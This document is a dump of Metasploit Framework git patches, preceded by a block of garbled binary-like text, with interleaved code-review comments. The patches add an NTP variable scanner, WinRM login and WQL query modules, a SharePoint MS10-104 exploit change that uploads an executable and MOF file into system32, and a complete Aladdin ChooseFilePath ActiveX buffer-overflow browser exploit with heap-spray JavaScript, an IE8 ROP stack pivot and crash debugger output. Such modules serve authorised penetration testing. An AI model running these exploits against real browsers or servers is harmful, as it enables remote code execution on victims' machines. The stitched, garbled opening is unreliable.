z?cBLDOpA5WG*M2Sr05WriGZE<@86%BoBR6fuZJjF(8D9ZiTxKF8{62}7_?9!4vYY& z=H}*%jEv08%%ew-hA3Td!y~}yl~-O#NJuz;{(MSGN|$(G1URAG!Gi~1xNw0JXw#-m z!Rb1bQIX+<@8N-`PoGXpOAAH1;KoLVQ)Ol4)~#ESs7rQLXq<2`kE+DwRO$mW_<8IT zxyBGU;aWri!hw78bm-6_jwqxiQaBur$cgW9<`6ikO+%C;C!8~94i&w^nKNggt1j76 zu-CUbp%N@76|l8{d-v{zB398YB=D+EW>3-Wolt3C+1pay@^W{l!ZucuU?*Cb)@n0v 
ztAw{bSWZZxEukgCcmz7-Y3wI7Eg-guuz8q}UH@LC$*M>M$5lDtht|I9V;B z=c7WJhqbIc$dHJB9s@s}J1l`FSRruow$-2oA*`jsxuR>Os1*Pkjsg_mqo9m+>(=QZ z{!~KXn5{w{EHUl@N8SskC!i{Y~{(XIqzY+P81t%9ShEuU~IvrapAAapF>&N_ zOhpE&!Zxo&1V+u8HA@S-WXTdX<*8Gre9RNXtw1=b=@l~!uwumu9}6l|;h&QyPlg!< zFRHJvPfSc)ym+yuh5PmI-=DigLTkq1W9ANT1$BvDOi76~B zRHjm$byQTBcr~V?13?5Uk{_ZBAJbZI(G%PAQ3x91LmqUdwr^0JY;sxGQFRC*X>xLM zTwL7d&6{l8(=O z7Drfgos^U`a^y&E&6qKRxM1s}zWC6Mw$C+fM>!@$UUC-BGxWqOD&gd_+FnnkDuHk! z9Z=fu)29z13%%&VA}q^Y7DU%iVR^O@}e8G&urKO zOTZhA(%(JFv`$N%Zh>%8qc?8cNEBE8i@{XE8CcdTJNpCaR;^maD-3KaBRldcF&Tw2 z=zwBIj2JO}`gC}37fx0eRWsO(YMYk3=5b+b?(kBjY8`f?10qkFG^uajz5@mf*t2Jk zZ3uS}9CA=$XABuKgv|#h?B~O;V96-kR9vD$G=ZX72PLxZ=rwh-o5kl z^I4G7mO@3DR<{t{X(vxoW^@EF1!Em{)+azdxLnQal@m*}9iwG{@+ zGg%pNwrtq~31ne5oRdDV_dSpGE>x6aph5((>DWI`O-)UNWc29G@!ov%%@Ze1kUY8T zn#Cc3N3p9|9G8a#UXNUg2jA1v!76fyb^kc2yd04S4H{%iWfYqY8#b&li{90hZIuR3 zf1dtJ{cmcBQu`hr2q#k4rAwE>OxeuJM&-6^*REBZZks2+aN)7UI$|N(+}7+{u2Am! z$BBnGo}6@2P6cK>C1M(DBb@L(JgR>}e{cIEEi=tHYBaV*@UJKQ?Svg@s4A#=p!YN67n=o+#``;TU z;$FNXKBDgDAE&ct&#EW@6}A-TjiRN=5z~ebA5LICckW!`;6z(+wed^INHLlt=zjij z(w|4TT&|umF|mCHB_*XCK73dag%IZ9C}clz@J!8}Y9nF0T(xdhY-4On+of*^Y#l

j;lwk&564r&YWF+SCTVHdi{G5cMpYEBiJ&r2 z4qR-;eo7qJf#a#+%Ki4X?X}GomP`LQp;`9?L9MT|YHW7kzyS_ree8M@kli*aZPe_o zv%Pf)vE4sTz84`;);yq2-gEb+yS)t|4H}vg>VIjo%2#GJXL6?h%T6%W?zDjgNAD@U##0ZvL-q63`VAFLxsMb8{DPI`sT zuS7X@zRrVLF>0q^wAT4!qIT+hod>gG)K0-@t@Fo3?bP`?4`#)vor2L?=Z|@J+DU#x zQoekYB7gAIUN;*;cv->Nm0%TE4c36QU>#TwHh?dKuK@XN$Bp1_unBAi_kgd0d%=BR z3-}t?3gowD?+4q#*Ma;F=r_PO!A|f1co6IY-vYbAx4|B;7d!;M1NMQ3!6V?i;8Cz2 zJO&;I2f#tl1ilBJ0EfVn;QQb(I0BvmKL9@jN5L_09Q+9U82kjB06zuI;Ah|@I0b$V zo(9i=Ux3q~1^g2H3j7*83!VeN0sL8kaTc5dzXiVo&x7BCKY;U~6}$jm1b+lCfj@yi zgA3py_zU 'NTP Clock Variables Disclosure', 'Description' => %q{ - This module reads the system internal NTP variables. These variables contain potentially sensitive + This module reads the system internal NTP variables. These variables contain potentially sensitive information, such as the NTP software version, operating system version, peers, and more.. }, 'Author' => 'Ewerson Guimaraes(Crash) ', @@ -62,4 +64,4 @@ class Metasploit3 < Msf::Auxiliary end -end +end \ No newline at end of file From ffe8a980f45ab98fd9b46f89bf7364f957e1cb3a Mon Sep 17 00:00:00 2001 From: "Ewerson Guimaraes (Crash)" Date: Tue, 30 Oct 2012 22:25:23 -0200 Subject: [PATCH 37/64] NTP Module - Remove [WARNING] Carriage return EOL --- modules/auxiliary/scanner/ntp/ntp_readvar.rb | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) diff --git a/modules/auxiliary/scanner/ntp/ntp_readvar.rb b/modules/auxiliary/scanner/ntp/ntp_readvar.rb index 34cbd132f9..15a2cad93f 100644 --- a/modules/auxiliary/scanner/ntp/ntp_readvar.rb +++ b/modules/auxiliary/scanner/ntp/ntp_readvar.rb @@ -1,11 +1,7 @@ -##### - - # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. -# http://metasploit.com/ -## +# http://metasploit.com/ require 'msf/core' 
@@ -21,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'NTP Clock Variables Disclosure', 'Description' => %q{ - This module reads the system internal NTP variables. These variables contain potentially sensitive + This module reads the system internal NTP variables. These variables contain potentially sensitive information, such as the NTP software version, operating system version, peers, and more.. }, 'Author' => 'Ewerson Guimaraes(Crash) ', @@ -64,4 +60,4 @@ class Metasploit3 < Msf::Auxiliary end -end \ No newline at end of file +end From a2fd377326bf15b4abed582245c44ced86bef4da Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 31 Oct 2012 09:20:00 +0100 Subject: [PATCH 38/64] module cleanup --- modules/auxiliary/scanner/ntp/ntp_readvar.rb | 36 +++++++++++--------- 1 file changed, 20 insertions(+), 16 deletions(-) diff --git a/modules/auxiliary/scanner/ntp/ntp_readvar.rb b/modules/auxiliary/scanner/ntp/ntp_readvar.rb index 15a2cad93f..988eeffe29 100644 --- a/modules/auxiliary/scanner/ntp/ntp_readvar.rb +++ b/modules/auxiliary/scanner/ntp/ntp_readvar.rb @@ -17,16 +17,16 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'NTP Clock Variables Disclosure', 'Description' => %q{ - This module reads the system internal NTP variables. These variables contain potentially sensitive - information, such as the NTP software version, operating system version, peers, and more.. + This module reads the system internal NTP variables. These variables contain + potentially sensitive information, such as the NTP software version, operating + system version, peers, and more. }, - 'Author' => 'Ewerson Guimaraes(Crash) ', + 'Author' => [ 'Ewerson Guimaraes(Crash) ' ], 'License' => MSF_LICENSE, - 'Version' => '', 'References' => [ - ['URL','http://www.rapid7.com/vulndb/lookup/ntp-clock-variables-disclosure' ], - ] + [ 'URL','http://www.rapid7.com/vulndb/lookup/ntp-clock-variables-disclosure' ], + ] ) ) register_options( 
@@ -45,17 +45,21 @@ class Metasploit3 < Msf::Auxiliary print_status("Sending command") udp_sock.put(readvar) reply = udp_sock.recvfrom(65535, 0.1) - p_reply =( reply[0].split(",")) + if not reply or reply[0].empty? + print_error("#{rhost}:#{rport} - Couldn't read NTP variables") + return + end + p_reply = reply[0].split(",") arr_count = 0 - while ( arr_count < p_reply.size) - if arr_count == 0 - print_good (p_reply[arr_count].slice(12,p_reply[arr_count].size)) #12 is the adjustment of packet garbage - arr_count = arr_count + 1 - else - print_good (p_reply[arr_count].strip) - arr_count = arr_count + 1 - end - end + while ( arr_count < p_reply.size) + if arr_count == 0 + print_good("#{rhost}:#{rport} - #{p_reply[arr_count].slice(12,p_reply[arr_count].size)}") #12 is the adjustment of packet garbage + arr_count = arr_count + 1 + else + print_good("#{rhost}:#{rport} - #{p_reply[arr_count].strip}") + arr_count = arr_count + 1 + end + end disconnect_udp end From ec8a2955e1f0b46c5fc61609d73b4ee76127b132 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 31 Oct 2012 03:32:43 -0500 Subject: [PATCH 39/64] Add OSVDB-86723 Aladdin Knowledge System ChooseFilePath Bof --- .../browser/aladdin_choosefilepath_bof.rb | 205 ++++++++++++++++++ 1 file changed, 205 insertions(+) create mode 100644 modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb diff --git a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb new file mode 100644 index 0000000000..9e93d651d3 --- /dev/null +++ b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb 
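Review bot: In ntp_readvar.rb, the new early `return` on an empty reply skips the `disconnect_udp` at the end of the method, so every host that does not answer leaves its UDP socket open for the rest of the scan. Call `disconnect_udp` before the `return`, or move the cleanup into an `ensure` block around the send/receive code. `reply[0].empty?` will itself raise if `recvfrom` hands back a nil payload on timeout; its contract is not visible from here, so `reply[0].to_s.empty?` is the safer test. The reply is untrusted network data and `slice(12, ...)` returns nil when the first field is shorter than 12 bytes, which is worth a comment next to the existing "adjustment" remark. The method starts outside the hunk.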
@@ -0,0 +1,205 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::Remote::BrowserAutopwn + + autopwn_info({ + :ua_name => HttpClients::IE, + :ua_minver => "6.0", + :ua_maxver => "7.0", + :javascript => true, + :os_name => OperatingSystems::WINDOWS, + :rank => Rank, + :classid => "{09F68A41-2FBE-11D3-8C9D-0008C7D901B6}", + :method => "ChooseFilePath", + }) + + + def initialize(info={}) + super(update_info(info, + 'Name' => "Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow", + 'Description' => %q{ + This module exploits a vulnerability found in Aladdin Knowledge System's + ActiveX component. By supplying a long string of data to the ChooseFilePath() + function, a buffer overflow occurs, which may result in remote code execution + under the context of the user. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'b33f', #Original + 'sinn3r' #Metasploit + ], + 'References' => + [ + [ 'OSVDB', '86723' ], + [ 'EDB', '22301' ] + ], + 'Payload' => + { + 'StackAdjustment' => -3500 + }, + 'DefaultOptions' => + { + 'InitialAutoRunScript' => 'migrate -f' + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', {} ], + [ 'IE 6 on Windows XP SP3', { 'Offset' => '0x5F4' } ], + [ 'IE 7 on Windows XP SP3', { 'Offset' => '0x5F4' } ], + [ 'IE 8 on Windows XP SP3', { 'Offset' => '0x5f4' } ], + [ 'IE 7 on Windows Vista', { 'Offset' => '0x5f4' } ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Apr 1 2012", + 'DefaultTarget' => 0)) + + register_options( + [ + OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) + ], self.class) + + end + + def get_target(agent) + #If the user is already specified by the user, we'll just use that + return target if target.name != 'Automatic' + + nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' + ie = agent.scan(/MSIE (\d)/).flatten[0] || '' + + ie_name = "IE #{ie}" + + case nt + when '5.1' + os_name = 'Windows XP SP3' + when '6.0' + os_name = 'Windows Vista' + when '6.1' + os_name = 'Windows 7' + end + + targets.each do |t| + if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? 
and t.name.include?(os_name)) + print_status("Target selected as: #{t.name}") + return t + end + end + + return nil + end + + def ie_heap_spray(my_target, p) + js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) + js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) + js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch)) + + # Land the payload at 0x0c0c0c0c + + js = %Q| + var heap_obj = new heapLib.ie(0x20000); + var code = unescape("#{js_code}"); + var nops = unescape("#{js_nops}"); + while (nops.length < 0x80000) nops += nops; + var offset = nops.substring(0, #{my_target['Offset']}); + var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); + while (shellcode.length < 0x40000) shellcode += shellcode; + var block = shellcode.substring(0, (0x80000-6)/2); + heap_obj.gc(); + for (var i=1; i < 0x300; i++) { + heap_obj.alloc(block); + } + var overflow = nops.substring(0, 10); + | + + js = heaplib(js, {:noobfu => true}) + + if datastore['OBFUSCATE'] + js = ::Rex::Exploitation::JSObfu.new(js) + js.obfuscate + end + + return js + end + + def load_exploit_html(my_target, cli) + p = payload.encoded + spray = ie_heap_spray(my_target, p) + + html = %Q| + + + + + | + + return html + end + + def on_request_uri(cli, request) + agent = request.headers['User-Agent'] + uri = request.uri + print_status("Requesting: #{uri}") + + my_target = get_target(agent) + # Avoid the attack if no suitable target found + if my_target.nil? + print_error("Browser not supported, sending 404: #{agent}") + send_not_found(cli) + return + end + + html = load_exploit_html(my_target, cli) + html = html.gsub(/^\t\t/, '') + print_status("Sending HTML...") + send_response(cli, html, {'Content-Type'=>'text/html'}) + end + +end + +=begin +0:008> g +(82c.12dc): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. 
+This exception may be expected and handled. +eax=0c0c0c0c ebx=00001d56 ecx=020b93d4 edx=00001d56 esi=00001d60 edi=020b93e8 +eip=7712a41a esp=020b93bc ebp=020b93c4 iopl=0 nv up ei pl zr na pe nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 +OLEAUT32!SysReAllocStringLen+0x31: +7712a41a 8b00 mov eax,dword ptr [eax] ds:0023:0c0c0c0c=???????? +0:008> g +(82c.12dc): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000 +eip=0c0c0c0c esp=020b8fec ebp=020b900c iopl=0 nv up ei pl zr na pe nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 +0c0c0c0c ?? ??? +0:008> db 020bf798 +020bf798 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ +020bf7a8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ +020bf7b8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ +020bf7c8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ +020bf7d8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ +020bf7e8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ +020bf7f8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ +020bf808 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ +=end \ No newline at end of file From 91e6b7cd288b05cbc1ee5e5e0d974572077446e6 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 31 Oct 2012 11:57:38 +0100 Subject: [PATCH 40/64] added ie8 target --- .../browser/aladdin_choosefilepath_bof.rb | 57 +++++++++++++++---- 1 file changed, 45 insertions(+), 12 deletions(-) diff --git a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb index 9e93d651d3..7a50c7446d 100644 --- a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb 
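Review bot: In aladdin_choosefilepath_bof.rb, the comment at the top of `get_target` reads "If the user is already specified by the user", which should refer to the target: `# If the target was already specified by the user, just use that`. The `=begin`/`=end` block at the end of the file is pasted debugger output with no heading, so a one-line note saying what it records and on which platform it was captured would make it usable as documentation. The file also ends without a trailing newline.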
+++ b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb @@ -12,11 +12,12 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn + include Msf::Exploit::RopDb autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "6.0", - :ua_maxver => "7.0", + :ua_maxver => "8.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, :rank => Rank, @@ -37,12 +38,15 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'b33f', #Original - 'sinn3r' #Metasploit + 'shinnai', #Vulnerability Discovery + 'b33f', #Original exploit + 'sinn3r', #Metasploit + 'juan vazquez' #Metasploit, IE8 target ], 'References' => [ [ 'OSVDB', '86723' ], + [ 'EDB', '22258' ], [ 'EDB', '22301' ] ], 'Payload' => @@ -57,10 +61,34 @@ class Metasploit3 < Msf::Exploit::Remote 'Targets' => [ [ 'Automatic', {} ], - [ 'IE 6 on Windows XP SP3', { 'Offset' => '0x5F4' } ], - [ 'IE 7 on Windows XP SP3', { 'Offset' => '0x5F4' } ], - [ 'IE 8 on Windows XP SP3', { 'Offset' => '0x5f4' } ], - [ 'IE 7 on Windows Vista', { 'Offset' => '0x5f4' } ] + [ 'IE 6 on Windows XP SP3', + { + 'Rop' => false, + 'Offset' => '0x5F4', + 'Ret' => 0x0c0c0c0c + } + ], + [ 'IE 7 on Windows XP SP3', + { + 'Rop' => false, + 'Offset' => '0x5F4', + 'Ret' => 0x0c0c0c0c + } + ], + [ 'IE 8 on Windows XP SP3', + { + 'Rop' => true, + 'Offset' => '0x5f6', + 'Ret' => 0x77c2282e # stackpivot # mov esp,ebp # pop ebp # retn # msvcrt.dll + } + ], + [ 'IE 7 on Windows Vista', + { + 'Rop' => false, + 'Offset' => '0x5F4', + 'Ret' => 0x0c0c0c0c + } + ] ], 'Privileged' => false, 'DisclosureDate' => "Apr 1 2012", 
@@ -104,7 +132,6 @@ class Metasploit3 < Msf::Exploit::Remote def ie_heap_spray(my_target, p) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) - js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch)) # Land the payload at 0x0c0c0c0c @@ -135,7 +162,13 @@ class Metasploit3 < Msf::Exploit::Remote end def load_exploit_html(my_target, cli) - p = payload.encoded + + if my_target['Rop'] + p = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'}) + else + p = payload.encoded + end + spray = ie_heap_spray(my_target, p) html = %Q| @@ -144,9 +177,9 @@ class Metasploit3 < Msf::Exploit::Remote | From ef0f415c51c4df083a29211e0f0179d374a9f3ab Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 31 Oct 2012 17:46:57 +0100 Subject: [PATCH 41/64] related to #980 adds support for HttpClient --- .../windows/misc/ms10_104_sharepoint.rb | 37 ++++++++----------- 1 file changed, 15 insertions(+), 22 deletions(-) diff --git a/modules/exploits/windows/misc/ms10_104_sharepoint.rb b/modules/exploits/windows/misc/ms10_104_sharepoint.rb index 4791d63fee..c34c423477 100644 --- a/modules/exploits/windows/misc/ms10_104_sharepoint.rb +++ b/modules/exploits/windows/misc/ms10_104_sharepoint.rb @@ -10,7 +10,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking - include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::WbemExec 
@@ -89,24 +89,17 @@ class Metasploit3 < Msf::Exploit::Remote soap_convert_file << "" << "\x0d\x0a" soap_convert_file << "" << "\x0d\x0a" - http_request = "POST /HtmlTrLauncher HTTP/1.1" << "\x0d\x0a" - http_request << "User-Agent: Mozilla/4.0+(compatible; MSIE 6.0; Windows 5.2.3790.131072; MS .NET Remoting; MS .NET CLR 2.0.50727.42 )" << "\x0d\x0a" - http_request << "Content-Type: text/xml; charset=\"utf-8\"" << "\x0d\x0a" - http_request << "SOAPAction: \"http://schemas.microsoft.com/clr/nsassem/Microsoft.HtmlTrans.IDocumentConversionsLauncher/Microsoft.HtmlTrans.Interface#ConvertFile\"" << "\x0d\x0a" - http_request << "Host: #{rhost}:#{rport}" << "\x0d\x0a" - http_request << "Content-Length: #{soap_convert_file.length}" << "\x0d\x0a" - http_request << "Connection: Keep-Alive" << "\x0d\x0a\x0d\x0a" - - connect - sock.put(http_request << soap_convert_file) - data = "" - read_data = sock.get_once(-1, 1) - while not read_data.nil? - data << read_data - read_data = sock.get_once(-1, 1) - end - disconnect - return data + res = send_request_cgi({ + 'uri' => '/HtmlTrLauncher', + 'method' => 'POST', + 'ctype' => 'text/xml; charset="utf-8"', + 'headers' => + { + 'SOAPAction' => '"http://schemas.microsoft.com/clr/nsassem/Microsoft.HtmlTrans.IDocumentConversionsLauncher/Microsoft.HtmlTrans.Interface#ConvertFile"', + }, + 'data' => soap_convert_file + }) + return res end # The check tries to create a test file in the root @@ -119,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Sending HTTP ConvertFile Request to upload the test file #{filename}") res = upload_file(filename, contents) - if res and res =~ /200 OK/ and res =~ /ConvertFileResponse/ and res =~ /CE_OTHER<\/m_ce>/ + if res and res.code == 200 and res.body =~ /ConvertFileResponse/ and res.body =~ /CE_OTHER<\/m_ce>/ return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe 
@@ -138,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") res = upload_file("WINDOWS\\system32\\#{exe_name}", exe) - if res and res =~ /200 OK/ and res =~ /ConvertFileResponse/ and res =~ /CE_OTHER<\/m_ce>/ + if res and res.code == 200 and res.body =~ /ConvertFileResponse/ and res.body =~ /CE_OTHER<\/m_ce>/ print_good("#{peer} - #{exe_name} uploaded successfully") else print_error("#{peer} - Failed to upload #{exe_name}") @@ -147,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") res = upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) - if res and res =~ /200 OK/ and res =~ /ConvertFileResponse/ and res =~ /CE_OTHER<\/m_ce>/ + if res and res.code == 200 and res.body =~ /ConvertFileResponse/ and res.body =~ /CE_OTHER<\/m_ce>/ print_good("#{peer} - #{mof_name} uploaded successfully") else print_error("#{peer} - Failed to upload #{mof_name}") From c5262a3e6419b886629863415c2168e2956346e8 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 31 Oct 2012 15:11:00 -0500 Subject: [PATCH 42/64] Update the description about AllowUnencrypted --- modules/auxiliary/scanner/winrm/winrm_login.rb | 10 ++++++++-- modules/auxiliary/scanner/winrm/winrm_wql.rb | 14 +++++++++++--- 2 files changed, 19 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index 198bdd83d6..146a863da1 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb 
@@ -28,8 +28,9 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module attempts to authenticate to a WinRM service. It currently works only if the remote end allows Negotiate(NTLM) authentication. - Kerberos is not currently supported. - }, + Kerberos is not currently supported. Please note: in order to use this + module, the 'AllowUnencrypted' winrm option must be set. + }, 'Author' => [ 'thelightcosine' ], 'References' => [ @@ -77,3 +78,8 @@ class Metasploit3 < Msf::Auxiliary end end + +=begin +To set the AllowUncrypted option: +winrm set winrm/config/service @{AllowUnencrypted="true"} +=end diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index 8cb82a2db9..5cbdc5452d 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -29,7 +29,9 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module runs WQL queries against remote WinRM Services. Authentication is required. Currently only works with NTLM auth. - }, + Please note in order to use this module, the 'AllowUnencrypted' + winrm option must be set. + }, 'Author' => [ 'thelightcosine' ], 'License' => MSF_LICENSE ) @@ -69,6 +71,12 @@ class Metasploit3 < Msf::Auxiliary print_status "Results saved to #{path}" end - - end + +=begin +=begin +To set the AllowUncrypted option: +winrm set winrm/config/service @{AllowUnencrypted="true"} +=end + +=end \ No newline at end of file From 834d9028cdff02453001f966822d5f553195922d Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 31 Oct 2012 15:13:21 -0500 Subject: [PATCH 43/64] Fix syntax error --- modules/auxiliary/scanner/winrm/winrm_wql.rb | 3 --- 1 file changed, 3 deletions(-) diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index 5cbdc5452d..31fabd59ec 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb 
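Review bot: The comment block appended after the class misspells the option as `AllowUncrypted` in its heading, while the command below it and the new description text use `AllowUnencrypted`; the heading should read `To set the AllowUnencrypted option:`. The same block with the same misspelling is added to winrm_wql.rb in this commit and again in PATCH 46/64. The block also does not say that the setting is changed on the WinRM service under test and makes it accept unencrypted message traffic. A line such as `Lab/test hosts only: this lets the service accept unencrypted WinRM messages; set it back to "false" afterwards` would be worth adding.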
@@ -73,10 +73,7 @@ class Metasploit3 < Msf::Auxiliary end -=begin =begin To set the AllowUncrypted option: winrm set winrm/config/service @{AllowUnencrypted="true"} =end - -=end \ No newline at end of file From 09195ad9a75e60a9e8391ea521ebc6f4b0785525 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 30 Oct 2012 09:13:55 -0500 Subject: [PATCH 44/64] Adds the WQL execution module --- modules/auxiliary/scanner/winrm/winrm_wql.rb | 69 ++++++++++++++++++++ 1 file changed, 69 insertions(+) create mode 100644 modules/auxiliary/scanner/winrm/winrm_wql.rb diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb new file mode 100644 index 0000000000..cb33fdb476 --- /dev/null +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb 
@@ -0,0 +1,69 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+
+require 'msf/core'
+require 'rex/proto/ntlm/message'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::WinRM
+ include Msf::Auxiliary::Report
+
+
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'WinRM WQL Query Runner',
+ 'Version' => '$Revision$',
+ 'Description' => %q{
+ This module runs WQL queries against remote WinRM Services.
+ Authentication is required. Currently only works with NTLM auth.
+ },
+ 'Author' => [ 'thelightcosine' ],
+ 'License' => MSF_LICENSE
+ )
+
+ register_options(
+ [
+ OptString.new('WQL', [ true, "The WQL query to run", "Select Name,Status from Win32_Service" ]),
+ OptString.new('USERNAME', [ true, "The username to authenticate as"]),
+ OptString.new('PASSWORD', [ true, "The password to authenticate with"])
+ ], self.class)
+ end
+
+
+ def run_host(ip)
+ unless accepts_ntlm_auth
+ print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth"
+ return
+ end
+
+ resp,c = send_request_ntlm(winrm_wql_msg(datastore['WQL']))
+ if resp.code == 401
+ print_error "Login Failure! Recheck the supplied credentials."
+ return
+ end
+
+ unless resp.code == 200
+ print_error "Got unexpected response from #{ip}: \n #{resp.to_s}"
+ return
+ end
+ resp_tbl = parse_wql_response(resp)
+ print_good resp_tbl.to_s
+ store_loot("winrm.wql_results", "text/csv", ip, resp_tbl.to_csv, "winrm_wql_results.csv", "WinRM WQL Query Results")
+ end
+
+
+
+end
From 8711484438a36cfb9a17eb1a72784e32e2c5c36d Mon Sep 17 00:00:00 2001
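Review bot: The first error string in `run_host` opens a parenthesis that is never closed (`(#{ip} does not appear ...`), so the host is printed inside a malformed message. It should read `print_error "The Remote WinRM server (#{ip}) does not appear to allow Negotiate(NTLM) auth"`. The second value returned by `send_request_ntlm` is bound to `c` and never used, so `resp, _ = send_request_ntlm(...)` would state that directly. The non-200 branch prints `resp.to_s`, which puts the whole response into console output; printing `resp.code` would probably be enough there.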
From: David Maloney Date: Tue, 30 Oct 2012 11:08:57 -0500 Subject: [PATCH 45/64] minor fixups --- modules/auxiliary/scanner/winrm/winrm_wql.rb | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index cb33fdb476..8cb82a2db9 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'WinRM WQL Query Runner', 'Version' => '$Revision$', 'Description' => %q{ - This module runs WQL queries against remote WinRM Services. + This module runs WQL queries against remote WinRM Services. Authentication is required. Currently only works with NTLM auth. }, 'Author' => [ 'thelightcosine' ], @@ -48,8 +48,12 @@ class Metasploit3 < Msf::Auxiliary print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" return end - + resp,c = send_request_ntlm(winrm_wql_msg(datastore['WQL'])) + if 